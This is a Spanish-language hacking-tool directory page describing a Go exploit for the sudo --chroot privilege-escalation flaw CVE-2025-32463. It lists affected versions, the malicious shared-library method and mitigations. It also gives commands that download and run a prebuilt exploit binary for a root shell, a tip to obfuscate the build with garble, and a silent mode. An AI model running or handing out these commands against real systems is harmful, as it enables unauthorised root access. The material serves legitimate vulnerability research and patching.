Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32463 — Este CVE aborda una vulnerabilidad en las versiones de sudo 1.9.14 a 1.9.17, permitiendo una escalada de privilegios local no autorizada al acceso root. | Kitploit
Herramientas/GitHubGitHub/nowafen/cve-2025-32463
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónPruebas de PenetraciónExplotación de Binarios
GitHubnowafen/cve-2025-32463

CVE-2025-32463

Este CVE aborda una vulnerabilidad en las versiones de sudo 1.9.14 a 1.9.17, permitiendo una escalada de privilegios local no autorizada al acceso root.

Ver Repositorio
262hace 1 mesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de CVE-2025-32463

GitHub stars GitHub license

Descripción general

Este repositorio proporciona una herramienta de exploit basada en Go para CVE-2025-32463, una vulnerabilidad crítica de escalada local de privilegios (CVSS 9.3) en sudo versiones 1.9.14 a 1.9.17. Permite a usuarios locales no autorizados obtener acceso root explotando una falla en la opción --chroot (-R).

⚠️ Advertencia: Solo para fines educativos y de prueba. Úsalo en entornos aislados (p. ej., VMs). No para uso malintencionado.

Detalles de la vulnerabilidad

  • CVE ID: CVE-2025-32463
  • Versiones afectadas: sudo 1.9.14–1.9.17
  • Impacto: Escalada local de privilegios a root
  • Descripción: El exploit manipula el entorno chroot para cargar una biblioteca compartida maliciosa, estableciendo UID/GID a 0 y generando un shell root.

Requisitos previos

  • Go 1.2+
  • gcc
  • libc-dev
  • Versión vulnerable de sudo
  • Usuario no privilegiado con acceso sudo y permisos para --chroot

Inicio rápido

Descargar el binario precompilado

root@kitploit:~
curl -L https://github.com/Nowafen/CVE-2025-32463/releases/download/exploit/exploit -o exploit
chmod +x exploit
./exploit --execution  # Launches root shell

Compilar desde el código fuente

root@kitploit:~
git clone https://github.com/Nowafen/CVE-2025-32463.git
cd CVE-2025-32463
go build -o exploit  # Or use garble for obfuscation
./exploit --execution

Uso

ComandoDescripción
./exploit --helpMostrar ayuda de uso
./exploit --aboutMostrar detalles de CVE

Verificación: En el shell root, ejecuta id (debe mostrar uid=0(root)) o whoami (debe mostrar root).

Cómo funciona (nivel alto)

  1. Crea el directorio temporal /tmp/sudowoot.stage.*
  2. Genera código C malicioso (woot1337.c) para el shell root
  3. Configura un chroot falso con la configuración de NSS
  4. Compila como biblioteca compartida (libnss_/woot1337.so.2)
  5. Ejecuta sudo -R woot woot para cargar la biblioteca y escalar privilegios
  6. Limpia automáticamente los archivos temporales

Mitigación

  • Actualizar sudo a la última versión
  • Deshabilitar chroot: Agrega Defaults !use_chroot a /etc/sudoers

Referencias

  • Entrada NVD

Aviso legal

Esta herramienta es para investigación de seguridad. El autor no es responsable del mal uso. Prueba siempre de forma responsable.


Creado por MNM

Descargar herramienta
./exploit --executionEjecutar exploit (abre shell root)
./exploit --execution --silentEjecución en modo silencioso